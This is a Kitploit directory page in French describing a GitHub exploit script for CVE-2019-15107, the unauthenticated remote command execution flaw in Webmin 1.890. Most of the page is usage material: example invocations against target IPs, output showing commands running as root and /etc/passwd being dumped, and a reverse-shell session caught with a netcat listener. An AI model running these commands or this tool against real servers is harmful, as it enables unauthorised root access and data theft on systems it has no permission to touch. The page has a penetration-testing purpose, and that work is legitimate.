Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-15107 — CVE-2019-15107 Webmin RCE non authentifié | Kitploit
Outils/GitHubGitHub/nasrallahbaadi/cve-2019-15107
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubnasrallahbaadi/cve-2019-15107

CVE-2019-15107

CVE-2019-15107 Webmin RCE non authentifié

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-15107 Webmin 1.890 Exécution de code à distance non authentifiée

Ce script est conçu pour exploiter la vulnérabilité d'exécution de commandes non authentifiée dans Webmin 1.890. Il vous permet d'exécuter des commandes arbitraires sur un serveur Webmin cible ou d'obtenir un reverse shell.

Utilisation

L'exploit prend 5 arguments :

root@kitploit:~
$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

La seule option obligatoire est , qui correspond à l'adresse IP de la cible.

Télécharger l’outil
-i

En exécutant l'exploit avec uniquement -i, la commande id sera exécutée sur une cible située sur le port 10000

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

Exécution de commandes

Vous pouvez spécifier la commande à exécuter à l'aide des options -c ou --command :

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

Reverse shell

Vous pouvez également obtenir un reverse shell en utilisant l'option --shell.

Vous serez invité à saisir votre adresse IP et le port d'écoute :

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
root@kitploit:~
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 

Proxy

En ajoutant l'option -x ou --proxy, vous pouvez envoyer la requête via le proxy Burp à l'adresse 127.0.0.1:8080

Références

https://nvd.nist.gov/vuln/detail/cve-2019-15107